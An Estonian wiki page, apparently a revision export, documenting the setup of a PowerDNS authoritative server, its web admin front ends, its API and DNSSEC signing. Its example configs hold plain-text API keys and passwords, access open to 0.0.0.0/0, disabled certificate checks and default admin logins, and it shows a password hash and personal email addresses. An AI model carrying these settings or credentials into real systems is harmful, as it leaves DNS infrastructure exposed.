ssl_session_timeout 10m;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305;

# Logging
access_log /dev/stdout;
error_log /dev/stdout;

# Reverse proxy to the destination
location / {
proxy_pass http://svc_pdns:8081;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}
}
}
</pre>

====Misc====

Tulemusena saab pda webgui poole pöörduda aadressiga https://pdns.moraal.ee/.

PDA kasutaja parooli muutmine postgresql baasis, nb rakendus kasutab tabeli nimena 'user', see on postgresql nö built-in objekt ja name clash ületamiseks tuleb pöörduda rakendusega seotud ressursi poole "user" abil, eriti koos skeemi prefiksiga

<pre>
# su - postgres
$ psql db_pda
pda=# select * from public."user";
-[ RECORD 1 ]------------------------------------------------------------
id | 1
username | admin
password | $2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FF
firstname | Imre
lastname | Oolberg
email | imre.oolberg@auul.pri.ee
otp_secret |
role_id | 1
confirmed | f
..

db_pda=# update public."user" set password='$2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FC' where username='admin';
UPDATE 1
</pre>

kusjuures password väärtus tekitatakse nt

<pre>
$ htpasswd -bnBC 15 "" pdaparool | tr -d ':\n'
$2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FC
</pre>

Kasutaja lisamine

<pre>
db_pda=# insert into "user" (username, password, firstname, lastname, email, role_id, confirmed) values ('admin', '$2b$12$4M9qXQaWn95GTregvSO2v.I/1QQT0/Ayqt3jZsMp06FIa5dMme6Gu', 'Administrator', 'Administrator', 'priit@moraal.ee', 1, 'f');
</pre>

pdns api kontakti lisamine

<pre>
db_pda=# insert into setting (name, value) values ('pdns_api_url', 'http://192.168.10.80:8081');
INSERT 0 1
db_pda=# insert into setting (name, value) values ('pdns_api_key', 'apiparool');
INSERT 0 1
db_pda=# insert into setting (name, value) values ('pdns_version', '4.9.11');
INSERT 0 1
db_pda=# select * from setting;
id | name | value
----+--------------+------------------------
7 | pdns_api_url | http://192.168.10.80:8081
8 | pdns_api_key | apiparool
9 | pdns_version | 4.9.11
(3 rows)
</pre>

====PDA kasutamise privileegid====

Väited

* Account - grupi taoline moodustis, praktiliselt võiks vastata domeeni omanik asutusele
* User - kasutaja taoline moodustis, vastab inimesele kes süsteemi kasutab
* User ja Account vaheliste seoste abil saab anda hulgale kasutajatele õiguse tegeleda hulga domeenidega

<pre>
root@rv-xxx-01:/opt/pda/dc# docker exec -ti e8 sh
/app $ ps aux
PID USER TIME COMMAND
1 pda 0:00 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG
7 pda 0:02 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG
8 pda 0:01 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG

[2025-10-31 13:06:25,927] [record.py:61] ERROR - Cannot fetch zone's record data from remote powerdns api. DETAIL: HTTPSConnectionPool(host='rvxxx-01.test.moraal.ee', port=443): Max retries exceeded with url: /api/v1/servers/localhost/zones/imretest-03.ee (Caused by SSLError(SSLCertVerificationError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self-signed certificate in certificate chain (_ssl.c:1007)')))

volumes:
# - /opt/pda/volume/pda/etc/ssl/certs/ca-certificates.crt:/usr/lib/python3.10/site-packages/certifi/cacert.pem
</pre>

====PDA API liidese kasutamine====

Tsooni tekitamine

<pre>
$ curl -s -L -H 'Content-Type: application/json' -H 'Authorization: Basic xxx' -X POST https://pda.moraal.ee/api/v1/pdnsadmin/zones \
--data '{"name": "zone-moraal-imre-test-01.ee.", "kind": "MASTER", "nameservers": ["ans1.moraal.ee.", "ans2.moraal.ee."]}' | jq .
{
"account": "",
"api_rectify": false,
"catalog": "",
"dnssec": false,
"edited_serial": 2026010802,
"id": "zone-moraal-imre-test-01.ee.",
"kind": "Master",
"last_check": 0,
"master_tsig_key_ids": [],
"masters": [],
"name": "zone-moraal-imre-test-01.ee.",
"notified_serial": 0,
"nsec3narrow": false,
"nsec3param": "",
"rrsets": [
{
"comments": [],
"name": "zone-moraal-imre-test-01.ee.",
"records": [
{
"content": "ans1.moraal.ee. hostmaster.moraal.ee. 2026010801 86400 7200 2419200 10800",
"disabled": false
}
],
"ttl": 3600,
"type": "SOA"
},
{
"comments": [],
"name": "zone-moraal-imre-test-01.ee.",
"records": [
{
"content": "ans1.moraal.ee.",
"disabled": false
},
{
"content": "ans2.moraal.ee.",
"disabled": false
}
],
"ttl": 3600,
"type": "NS"
}
],
"serial": 2026010801,
"slave_tsig_key_ids": [],
"soa_edit": "",
"soa_edit_api": "DEFAULT",
"url": "/api/v1/servers/localhost/zones/zone-moraal-imre-test-01.ee."
}
</pre>

Kui pole ligipääsu saab sellise vastuse

<pre>
% curl -s -L -H 'Content-Type: application/json' -H 'X-API-KEY: xxx' -X GET "https://pda.moraal.ee/api/v1/servers/localhost/zones/zone-moraal-imre-test-01.ee" | jq .
{
"msg": "Zone access not allowed"
}
</pre>

===pdns docker lahendus===

<pre>
# egrep -v "^$|^#" /etc/powerdns/pdns.conf
allow-axfr-ips=127.0.0.1,192.168.10.0/24
allow-notify-from=
allow-unsigned-notify=yes
also-notify=
api=yes
api-key=saladus
default-api-rectify=yes
default-ksk-algorithm=ecdsa256
default-soa-content=ans1.auu.pri.ee hostmaster.auul.pri.ee 0 86400 7200 2419200 10800
default-soa-edit=INCEPTION-INCREMENT
default-soa-edit-signed=INCEPTION-INCREMENT
default-ttl=3600
disable-syslog=no
forward-notify=
include-dir=/etc/powerdns/pdns.d
launch=
local-address=172.30.0.15, 10.30.0.15
local-port=53
log-dns-details=yes
log-dns-queries=yes
log-timestamp=yes
loglevel=4
only-notify=
primary=yes
secondary=yes
webserver=yes
webserver-address=10.30.0.15
webserver-allow-from=0.0.0.0/0
webserver-loglevel=detailed
webserver-password=saladus
webserver-port=8081
</pre>

===pdns podman lahendus===

PDNS Quadlet Service kirjeldus

<pre>
kasutaja@ns-pdns-01:~$ cat .config/containers/systemd/pdns-01.container
[Unit]
Description=My PDNS Quadlet Service
DefaultDependencies=no
After=network.target

[Container]
Image=docker.io/powerdns/pdns-auth-49:latest
PublishPort=1053:8053/tcp
PublishPort=1053:8053/udp
ContainerName=pdns-01
Volume=%h/volume/pdns/etc/powerdns/pdns.conf:/etc/powerdns/pdns.conf:ro
Environment=PDNS_local_port=8053

[Install]
# This tells systemd to start it when you log in
WantedBy=default.target
</pre>

ning pdns.conf seadistusfail

<pre>
# cat /opt/pdns/volume/pdns/etc/powerdns/pdns.conf
local-address=0.0.0.0
launch=
# include-dir=/etc/powerdns/pdns.d
api=yes
api-key=parool
webserver=yes
webserver-address=0.0.0.0
webserver-allow-from=0.0.0.0/0

#master=yes

primary=yes
secondary=yes
allow-axfr-ips= 100.20.21.0/24,127.0.0.1/32,172.17.0.0/16
also-notify=192.168.1.150
only-notify=
forward-notify=
default-soa-content=ans1.auul.pri.ee hostmaster.auul.pri.ee 0 86400 7200 2419200 10800
default-soa-edit=INCEPTION-INCREMENT
default-soa-edit-signed=INCEPTION-INCREMENT
default-ttl=3600

default-ksk-algorithm=ecdsa256
default-api-rectify=yes
# default-nsec3-param=1 0 0 -

launch+=gpgsql
gpgsql-dnssec=yes
gpgsql-extra-connection-parameters=password=parool dbname=db_pdns port=5432 user=pdns host=192.168.1.147
</pre>

===Tsooni migreerimine pädeva pdns peale===

Väited

* SOA-EDIT -

====Protseduur====

TODO

====Käsundamine====

Eksport

<pre>
# pdnsutil export-zone-key moraal.ee 17 > moraal.ee.ksk
# pdnsutil list-zone moraal.ee > moraal.ee.zone
</pre>

Import

<pre>
# pdnsutil create-zone moraal.ee
# pdnsutil load-zone moraal.ee.zone
</pre>

====Käsundamine - 2nd abil====

Tekitatakse migreeritava tsooni sekundaar

<pre>
# pdnsutil create-secondary-zone moraal.ee 192.168.1.148
</pre>

===Kasulikud lisamaterjalid===

* https://www.powerdns.com/
* http://www.poweradmin.org/
* https://github.com/PowerDNS/pdns/wiki/WebFrontends
* http://jpmens.net/2010/10/29/alternative-dns-servers-the-book-as-pdf/
* https://blog.powerdns.com/2016/02/02/powerdns-authoritative-the-new-old-way-to-manage-domains/
* https://www.cloudflare.com/dns/dnssec/how-dnssec-works/

PowerDNS Authoritative Server nimeserveri kasutamine

2026-06-16T21:42:58Z

Imre: /* Tsooni migreerimine pädeva pdns peale */

===Sissejuhatus===

PowerDNS https://www.powerdns.com/ on üks populaarsetest vaba tarkvaralistest nn alternatiivsetest DNS serveritest, kuigi 'alternatiivse' kohta väidetavalt teda kasutatakse väga massiliselt DNSSEC jaoks. PowerDNS tarkvara võimaldab pidada täielist DNS infrastruktuuri, sh slave ja master pädevate nimeserverite erinevad konfiguratsioonid. PowerDNS tarkvara komplekti kuuluvad

* PowerDNS Authoritative Server - pädev nimeserver
* PowerDNS Recursor - rekursiivne nimeserver
* dnsdist - koormusjaotur

PowerDNS Authoritative Server tarkvaral on sellised tunnused

* võimalus kasutada andmete salvestamiseks erinevaid nn backend'isid (nn plain text, sql andmebaas, ldap kataloog jne)
* väga mugavalt korraldada DNSSEC tsooni pidamist
* DNSSEC puhul on PowerDNS tarkvarale iseloomulik, et kõik DNSSEC moodustatakse käigult, st midagi ei ole salvestatud (well, midagi puhverdatakse, aga rrsig moodi kirjeid jms ei hoita nö tsoonifaili kujul)
* tsoonide käsitlemine (tekitamine, sisu muutmine, eemaldamine) on võimalik üle nn API
* eksisteerivad mitmesugused veebipõhised tsoonide haldusliidesed (otse baasi ja üle API)
* ebamugav on kontrollida, kust tsooni kopeeritakse, kuhu notify saadetakse ja kust lubatakse tsooni kopeerida

Haldusliidesed jagunevad kaheks

* kirjutavad otse samasse sql baasi, mida kasutab PowerDNS ja tegelikult töötavadki ainult SQL backendide puhul - nt Poweradmin, http://www.poweradmin.org/
* suhtlevad PowerDNS'iga üle API, töötavad kõigi backendide puhul - nt nsedit, https://github.com/tuxis-ie/nsedit

Järgnevas tekstis öeldakse lühiduse mõttes PowerDNS ja mõeldakse PowerDNS Authoritative Server ehk pädevat komponenti.

===Tööpõhimõte===

PowerDNS tarkvara saab kasutada erinevates konfiguratsioonides

* nö suure pildi mõttes, nt PowerDNS on varjatud master ja avalikus võrgus teenindavad NSD nimeserverid (alternatiiv oleks pidada PowerDNS nimeserverit otse avalikus võrgus)
* PowerDNS enda komponentidest on välja valitud mingi komplekt, nt baas osa ja PostgreSQL backend (alternatiiv oleks BIND formaadis tekstifailid failisüsteemis)
* tsooniandmete haldamiseks kasutatakse käsurea utiliiti pdnsutil ja nsedit php rakendust

Käesolevas tekstis keskendutakse just mainitud konfiguratsioonile. Kui PowerDNS kasutab SQL backendi, siis avaliku pädeva DNS teenuse pakkumise juures tekitab see vähemalt esmapilgul kahtlusi. Võib olla on hea mõte tekitada varjatud masteriga lahendus

ans1 (NSD) ans2 (NSD)
_____ _____
| | | |
| | | |
|_____| port 8952 |_____| port 8952
| |
| |
----|---------------------|----------------------|----
|
__|__
| | nimetaja (PowerDNS)
| |
|_____|

kus

* ans1, ans2 - avalikud pädevad nimeserverid, tehniliselt slave'id
* nimetaja - varjatud pädev nimeserver, tehniliselt master
* üle port 8952 saab nsd protsessi eemalt juhtida (alternatiiv on juhtida nö tavalisel viisil, lokaalselt)

Käesolevas tekstis pööratakse NSD tarkvara kasutamisele tähelepanu minimaalselt. NSD tekst asub aadressil [[:Pädeva nimeserveri NSD v. 4 kasutamine operatsioonisüsteemiga Debian]].

===Tarkvara paigaldamine ja seadistamine===

Tarkvara paigaldamiseks on üldiselt kaks võimalust

* operatsioonisüsteemi paketihaldus
* PowerDNS repositoorium - https://repo.powerdns.com/

PowerDNS tarkvara on jaotatud komponentideks

* üldosa
* tsoonidega seotud andmete salvesamiseks erinevad backendid (failisüsteem, SQL andembaas jne)

Kui asutakse kasutama SQL backendi, siis võib olla otstarbekas enne PowerDNS vastava backendi paigaldamist baas ise paigaldada ja käivitada; nt nt see baas ei pruugi olla tingimata samas arvutis. Teisipidi, mugavam on samas arvutis, kuna sel juhul baasi saab lähtestada dbconfig süsteemi abil; lisaks, kui kasutatakse DNSSEC'i, siis arvestada, et krüptomaterjal asub baasis. Käesolevas tekstis paigaldatakse tarkvara PowerDNS repositooriumist kuna seal on alati kõige värskem.

====PostgreSQL andmebaasi ettevalmistamine====

PowerDNS tarkvara ei ole PostgreSQL andmebaasi versiooni suhtes nõudlik, tõenäoliselt sobib igasugune v. 9.x ja nt en_US.UTF-8 kodeering

# apt-get install postgresql

====Paigaldamine PowerDNS repositooriumist====

PowerDNS repositoorium asub aadressil https://repo.powerdns.com/ ja kasutamine (Debian v. 9 Stretch juhtumil)

# cat /etc/apt/sources.list.d/pdns.list
deb http://repo.powerdns.com/debian stretch-auth-master main

ning öelda

# curl https://repo.powerdns.com/CBC8B383-pub.asc | sudo apt-key add -
# apt-get update

Tarkvara paigaldamiseks öelda (paistab, et bind backend paigaldatakse lisaks paratamatult)

# apt-get install pdns-server pdns-backend-pgsql

seejuures on valik paigaldada baas db-config süsteemi abil ja see validagi. Tulemusena tekitatakse baasi baasi kasutaja, create database, initsiliseeritakse baasi sisu ning kirjeldatakse PowerDNS backend seadistus

# cat /etc/powerdns/pdns.d/pdns.local.gpgsql.conf
# PostgreSQL Configuration
#
# Launch gpgsql backend
launch+=gpgsql

# gpgsql parameters
gpgsql-host=127.0.0.1
gpgsql-port=
gpgsql-dbname=pdns
gpgsql-user=pdns
gpgsql-password=pdnsparool
gpgsql-dnssec=yes

Vaikimisi käivitatakse PowerDNS protsessid ning natuke saab asuda süsteemi kasutama

# pdns_control list-zones
All zonecount:0

Järgmisena tuleb PowerDNS server seadistada.

====Käsitsi baasi lähtestamine====

Kui db-config süsteemi mitte kasutada, sobib tekitada kasutaja ja create database andmebaas käsitsi

# su - postgres
$ psql
..
postgres=# create role pdns login password 'pdnsparool' NOSUPERUSER INHERIT NOCREATEDB NOCREATEROLE;
postgres=# create database pdns owner = pdns;

ning seejärel laadida baasi sisu, õieti struktuur

# psql -h 127.0.0.1 -U pdns pdns < /usr/share/doc/pdns-backend-pgsql/schema.pgsql.sql

Lisaks peab olema seadistusfail /etc/powerdns/pdns.d/pdns.local.gpgsql.conf sobiva sisuga, vt. eelmist punkti.

===Tarkvara seadistamine===

Üldosa sobiks kokkuvõttes seadistada nt nii

# egrep -v "^$|^#" /etc/powerdns/pdns.conf
allow-axfr-ips=127.0.0.0/8,::1,192.168.1.210
also-notify=192.168.1.210
api=yes
api-key=midagisalajast123
default-soa-mail=hostmaster.moraal.ee.
default-soa-name=ans1.moraal.ee.
include-dir=/etc/powerdns/pdns.d
launch=
master=yes
only-notify=192.168.1.210
security-poll-suffix=
setgid=pdns
setuid=pdns
slave=yes
soa-expire-default=3600000
soa-minimum-ttl=3600
soa-refresh-default=86400
soa-retry-default=7200
webserver=yes
webserver-address=192.168.1.248
webserver-allow-from=0.0.0.0/0,::/0,192.168.10.0/24

kus

* allow-axfr-ips - millistelt ip aadressidelt on lubatud axfr
* also-notify - millistele ip aadressidel töötavatele nimeserveritele saata notify
* api* - api kasutamine (vajalik veebipõhise haldusliidese nsedit jaoks)
* default-soa-* - uue tsooni sisu moodustamisel kasutatavad vaikeväärtused
* only-notify - notify saadetakse ainult näidatud ip aadressidele (mitte tsoonifailides siselduvatele NS serveritele)
* soa-* uue tsooni sisu moodustamisel kasutatavad vaikeväärtused
* webserver* - powerdns sisemise veebiserveri ip aadress jms (saab uurida protsesside statistikat)

Muudatuste kehtestamiseks lõpetada ja käivitada pdns protsessid

# systemctl stop pdns
# systemctl start pdns

===Tsooni sisu haldamine käsurealt===

Tsooni sisu haldamine käsurealt toimub utiliidi pdnsutil abil. Uue tühja tsooni tekitamine (sisaldab SOA kirjet), seejärel tuleb vähemalt NS kirje tekitada (nb! nii tekib Native tüüpi tsoon)

# pdnsutil create-zone moraal.ee

Tulemuse küsimine

# pdnsutil show-zone moraal.ee

Tsooni Native -> Master teisendus

# pdnsutil set-kind moraal.ee master

Tsooni sisu esitamiseks

# pdnsutil list-zone moraal.ee

Sisu muutmiseks, sh muuta käsitsi SOA serial

# pdnsutil edit-zone moraal.ee

utiliidiga seriali suurendamiseks

# pdnsutil increase-serial moraal.ee

Tulemuse küsimine

# dig @127.0.0.1 moraal.ee axfr

Notify käsitsi välja saatmiseks

# pdns_control notify moraal.ee
Added to queue

Kirje lisamine (lisaks tuleb increase serial öelda)

# pdnsutil add-record moraal.ee imre5 A 300 "127.0.0.5"
Feb 21 10:20:54 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
New rrset:
imre5.moraal.ee. IN A 300 127.0.0.5

===Veebipõhine haldusliides nsedit===

Veebipõhiste haldusliideste abil saab

* tekitada ja kustutada tsoone, muuta tsoonide sisu
* loodetavasti haldusliidese abil jäävad tegemata mingid süntaksivead, mida on kerge teha nn BIND-ühilduvat tsoonifaili tavalise tekstieditoriga otse muutes
* tsooni sisu halduse saab usaldada mitte-vi/joe/nano ekspertiisiga inimesele

Paistab, et veebipõhiseid haldusliideseid on omajagu, https://github.com/PowerDNS/pdns/wiki/WebFrontends. nsedit on PHP rakendus. Märkused

* Tsoonis tehtud muudatustega kaasneb automaatselt SOA seriali suurenemine
* Veebiliideses tehtud muudatused ei kajastu alati sama veebiliideses koheselt (nt SOA seriali muutumine, välja ja sisselogimise järel on näha)
* nsedit esitab muudatuste logi
* toimib ipv6 jaoks
* nn õäöü tähti sisaldavaid nimesid sisestada otseselt ei saa
* rakenduse võib paigaldada http:// peale ja seejärel muuta veebiserveri seadistusi ning kasutada edasi https:// abil
* nsedit ei pea asuma samas arvutis PowerDNS serveriga, suhtlemine toimub üle võrgu ja kasutades API liidest

====Ettevalmistused====

nsedit kasutamise eelduseks on selline tarkvara

# apt-get install apache2 php git php-sqlite3 php-curl

====Paigaldamine ja seadistamine====

Kopeerida tarkvara, tundub, et 2017 aasta alguses on praktiline võtta git repo viimane ots

# cd /var/www/html
# git clone https://github.com/tuxis-ie/nsedit.git

Tekitada php skriptide jaoks kasutaja:grupp

# groupadd nsedit
# useradd -g nsedit -m -d /opt/nsedit -s /bin/false nsedit

Avades brauseris http://pdns.moraal.ee/nsedit küsitakse parooli, vaikimisi sobib admin ja admin mille järel

* kontrollitakse vajalike teekide olemasolu
* moodustatakse sqlite3 andmebaas

# sqlite3 /var/www/html/etc/pdns.users.sqlite3
..
sqlite> .tables
logs users zones

nsedit seadistatakse failis /var/www/html/nsedit/includes/config.inc.php

# cp includes/config.inc.php-dist includes/config.inc.php

* ühendust powerdns serveriga üle api juhib sektsioon

# cat /var/www/html/nsedit/includes/config.inc.php | grep '^$api'
$apipass = 'apiparool'; # The PowerDNS API-key
$apiip = '10.0.9.18'; # The IP of the PowerDNS API
$apiport = '8081'; # The port of the PowerDNS API
$apiproto = 'http'; # http | https
$apisslverify = FALSE; # Verify SSL Certificate if using https for apiproto

* vaikeväärtuste kasutamiset haldusliideses kontrollib

$defaults['soa_edit'] = 'INCEPTION-INCREMENT';
$defaults['soa_edit_api'] = 'INCEPTION-INCREMENT';
$defaults['defaulttype'] = 'Master'; # Choose between 'Native' or 'Master'
$defaults['ns'][0] = 'ns1.moraal.ee.'; # The value of the first NS-record
$defaults['ns'][1] = 'ns2.moraal.ee.'; # The value of the second NS-record
$defaults['ttl'] = 3600; # Default TTL for records
$defaults['disabled'] = false; # Default disabled state

Kasutajaliides paistab välja selline

[[Pilt:Pdns-1.gif]]

kus

* TODO

Kui rakendus töötab, muuta rakenduse failide omanik:grupp ära

# chown -R nsedit:nsedit /var/www/html/nsedit

====Kasutamine====

* Kasutajate lisamine, valida (ning märkida linnuke admin user jaoks), tulemusena on nsedit logid paremad

Users -> Add new user

* Uue tsooni lisamine, valida

Zones -> Add new zone

ning sisestada Domain lahtrisse domeeninimi, lõpetades punktiga, nt

test-1.ee.

Kõik muud valikud jätta vaikimisi

Account - admin
Type - master
Template - None

Kuna pdns serveri seadistusfailisis on näidatus SOA kirje väärtused ja nsedit seadisusfailis on kirjeldatud nimeserverid, siis tekib vaikimisi kastutatav tulemus.

* Uue tsooni lisamine kirjeldades korraga palju kirjeid (nt tsooni ületoomisel eelmise dns teenusepakkuja juurest)

Zones -> Import a new zone

seejuures

avanenud dialoogi pasteda tsoonifaili sisu
eemaldada SOA kirje
asendada NS kirjetesse õiged väärtused
kõik nimed (kirje kõige vasem positsioon) peavad olema pikad ja lõppema punktiga
eemaldada linnuke 'Overwrite Nameservers' juurest

* Mitme elemendilise väärtuse puhul tuleb see nii sisestada, nt MX kirje puhul

10 mx.moraal.ee.

* Eeldusel, et on olemas Content tulbas kasutatav A kirje ip aadressile vastav in-addr.arpa tsoon, saab nsedit abil tekitada automaatselt PTR kirje.

====Kasulikud lisamaterjalid====

* https://github.com/tuxis-ie/nsedit

===DNSSEC tsooni esmane juurutamine===

Tundub, et uuemal ajal saab DNSSEC juures kasatada CSK (Combined Signing Key) võtit ja seda kasutab PowerDNS vaikimisi, kuid samas CSK võtmeid registripidajad eriti ei toeta. Ja PowerDNS toetab ka nö klassikalist KSK+ZSK komplekti kasutamist.

====KSK ja ZSK võtmete kasutamine====

Võtmete tsooniga seostamiseks sobib öelda

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256
# pdnsutil add-zone-key moraal.ee zsk 1024 active rsasha256
# pdnsutil set-nsec3 moraal.ee '1 0 5 0...f'
# pdnsutil set-meta moraal.ee SOA-EDIT-API INCEPTION-INCREMENT
# pdnsutil set-meta moraal.ee SOA-EDIT INCEPTION-INCREMENT
# pdnsutil increase-serial moraal.ee
# pdnsutil rectify-zone moraal.ee
# pdnsutil show-zone moraal.ee

mis

* tekitab võtmed
* kui set-meta kogemata vääratab, nt lisati SOA-EDIT-SOA, siis saab meta data eemaldada, st näitamata väärtust

# pdnsutil set-meta moraal.ee SOA-EDIT-SOA

* võtab kasutusele nsec3 hash'ide arvutamiseks vajaliku materjali (0-f on 16-elemendiline juhuslik hex järgnevus, mis saadake nt nii

$ head -c 512 /dev/urandom | sha1sum | cut -b 1-16
7bc59a6dd87fa477

ja ideaalis võiks seda regulaarselt muuta), nt

$ dig +short moraal.ee nsec3param
1 0 5 E7544BB6070C3E0F

(kus 1 - sha1, 0 - opt-out, 5 - iterations, E7544BB6070C3E0F - salt)

* INCEPTION-INCREMENT rida seadistab selliselt, et kui automaaselt tsooni andmed resigneeritakse, siis suurendatakse ka seriali (muidu ei toimu notify ja andmed ei jõua avalikesse pädevatesse nimeserveritesse)
* rectify tuleb põhimõtteliselt öelda peale iga tsooni muudatust, et olla täiesti kindel tsooni toimimises; kui PowerDNS kasutatakse avalike nimeserverite varjatud masterina, pole see probleem

ning tsooni andmed paistavad

# pdnsutil show-zone moraal.ee
Nov 06 23:49:44 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
This is a Master zone
Last SOA serial number we notified: 2016103003 == 2016103003 (serial in the database)
Metadata items:
SOA-EDIT INCEPTION-INCREMENT
SOA-EDIT-API INCEPTION-INCREMENT
Zone has NSEC3 semantics, configuration: 1 0 1 ab
keys:
ID = 11 (ZSK), flags = 256, tag = 26589, algo = 8, bits = 1024 Active ( RSASHA256 )
ID = 10 (KSK), flags = 257, tag = 53461, algo = 8, bits = 2048 Active ( RSASHA256 )
KSK DNSKEY = moraal.ee. IN DNSKEY 257 3 8 AwEAAcn... TQcnQstT+tU= ; ( RSASHA256 )
DS = moraal.ee. IN DS 53461 8 1 6c123b39076072da... c66f62b1e3c388b86b7f ; ( SHA1 digest )
DS = moraal.ee. IN DS 53461 8 2 b85dee98efa6e3bb... 57ce193f728f6b2b1d0dd262 ; ( SHA256 digest )
DS = moraal.ee. IN DS 53461 8 3 1359b0b2b97e60b2... 844b207e84bf5c109eb2e151 ; ( GOST R 34.11-94 digest )
DS = moraal.ee. IN DS 53461 8 4 6d735926cd5cf68b... 9ca2af1f72b3b8f67900bb32a94c ; ( SHA-384 digest )

kus

* kaks võtit, ID väärtustega 10 ja 11

Seejärel tuleb registripidajale öelda DS väärtus.

Tulemuse saab kontrollida nt aadressil http://dnsviz.net/d/moraal.ee/dnssec/.

DNSSEC eemaldamiseks tuleb

* esmalt eemaldada registripidaja juurest DS kirje (reeglina see õnnestub, aga nt 2017 aasta kevadel .org domeenide puhul on tulemuseks dnssec viga, tavaline servfail)
* tsoonis dnssec väljalülitamiseks sobib öelda

# pdnsutil disable-dnssec moraal.ee

====Tulemuse kontrollimine====

Kui kõik juba töötab (ja on vist on vajalik, et kasutada on mõni dnssec-võimeline rekursiivne nimeserver), saab tulemust kontrollida nt nii

$ ldns-rrsig moraal.ee a
moraal.ee RRSIG(a): Thu Oct 27 00:00:00 2016 - Thu Nov 17 00:00:00 2016

====Märkused====

* DNSSEC RRSIG signatuure arvutatakse iga 2 nädala tagant üle selleks, et piirata replay attack võimalusi. Põhimõtteliselt saab pahalane päringule vastuseks saata mõne varasemalt võrgus olnud vastuse (st RRSet + RRSIG komplekti) eeldusel, et ta kontrollib kasutaja võrguliiklust. Tänu RRSIG piiratud kehtivusajale (nt 2 nädalat) saab ta seda teha mitte vanemate kui 2 nädalat andmetega, lisaks ta on piiratud saatma mitte suvalisi vastuseid, vaid viimase kahe nädala jooksul kasutuses olnud vastuseid.

====Kasulikud lisamaterjalid====

* https://blog.powerdns.com/2016/02/02/powerdns-authoritative-the-new-old-way-to-manage-domains/

====CSK võtme kasutamine====

Märkus 2016 lõpus: tundub, et see CSK on mingi tulevikutehnoloogia.

Olemasoleva tsooni jaoks DNSSEC sisselülitamiseks sobib öelda

# pdnsutil secure-zone moraal.ee
# pdnsutil set-nsec3 moraal.ee '1 0 1 ab'
# pdnsutil rectify-zone moraal.ee
# pdnsutil set-meta moraal.ee SOA-EDIT-API INCEPTION-INCREMENT
# pdnsutil increase-serial moraal.ee
# pdnsutil show-zone moraal.ee

Seejärel tuleb registripidajale öelda DS väärtus.

Tulemuse saab kontrollida nt aadressil http://dnsviz.net/d/moraal.ee/dnssec/.

DNSSEC eemaldamiseks tuleb

* esmalt eemaldada registripidaja juurest DS kirje
* tsoonis dnssec väljalülitamiseks sobib öelda

# pdnsutil disable-dnssec moraal.ee

Misc

* tagasi nsec peale viimiseks

# pdnsutil unset-nsec3 moraal.ee

===DNSSEC tsooni seostamine DS sissekande abil ülevalpool oleva tsooniga===

DNSSEC tsooni seostamiseks ülevalpool oleva tsooniga on vaja teada selliseid andmeid

* võtme silt
* võtme tüüp
* algoritm
* avalik võti (või DS mis on avaliku võtme räsi vms)

Need kõik on avalik info ja kättesaadavad domeeni pädevast nimeserverist, aga PowerDNS haldusutiliidiga saab selle küsida otsekoheselt

# pdnsutil show-zone moraal.ee

Ühesõnaga, kui ise kasutatakse PowerDNS'i või partner saadab need andmed, siis allpool toodud dig käsuga tegelemist pole tarvis läbi teha. Tulemust sobib kontrollida nt aadressil http://dnsviz.net/.

====zone.ee keskkonnas - .ee tsoonis====

Logida sisse oma kasutajaga ja valida vasakult paneelist 'Teenuste ülevaade', kõnelaluse tsooni juures pressida rohelist + märki DNSSEC tulbas. Avanenud uuel eraanil vajutada üleval sinist nuppu Aktiveeri (muutub roheliseks), vajutada võtmete nimekirjas + märki ja täita lahtrid

[[Pilt:Pdns-3.gif]]

kus

* võtme silt - (antud juhul 53461), selle saab teada päringu väjundist

$ dig @ns.auul.pri.ee moraal.ee dnskey rrsig | grep DNSKEY
moraal.ee. 10800 IN RRSIG DNSKEY 8 2 10800 20161208000000 20161117000000 53461 moraal.ee. rVy+HAzSKkTRv6...

* võtme tüüp - KSK
* algoritm - 8 (RSA-SHA256)
* avalik võti, selle saab teada päringu väljundist, alates Aw kuni tU= (võib sisaldada tühikuid nagu päringu vastuses on)

$ dig @ns.auul.pri.ee moraal.ee dnskey | grep 257
moraal.ee. 3600 IN DNSKEY 257 3 8 AwEAAcnmmnnOlkRfK9NDYEI6F ... SD6 TQcnQstT+tU=

Vajutada all nuppu Kinnita, muudatus kehtestub peaaegu koheselt (ehk minutite jooksul), aga kasutajaliideses öeldakse

DNSSEC kaitse domeenil MORAAL.EE
Hetkestaatus: DNSSEC on aktiveerimata
Eesootavad muutused: DNSSEC aktiveeritakse

Teha brauseris refresh ja peab olema domeenide nimekirjas DNSSEC tulbas + asemel kilbi kujutis. Edasi läheb nn 15 minutit kuni muudatus zone.ee juurest eestiinternet.ee juurde jõuab ning kehtestub ee. tld (top level domain) nimeserverites. Kontrolliks maksab küsida tld nimeserverilt ds kirjet

$ dig +short @ns.tld.ee moraal.ee ds
30607 8 2 EAC8A17DD2128573F08EE76C18B4AB01734467CD4A376768F5358B0C A2B9463F

====zone.ee keskkonnas - .org tsoonis====

[[Pilt:Pdns-6.gif]]

====GoDaddy keskkonnas====

TODO

===DNSSEC võtmete asendamine===

====ZSK====

====KSK====

KSK moodi võtme lisamiseks sobib öelda, selliselt võib tsooniga siduda ka enam kui kaks võtit

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256

Tsooniga seotud võtmed paistavad käsu väljundis

# pdnsutil show-zone moraal.ee

Tulemusena paistab dnsviz keskkonnas selline pilt

TODO

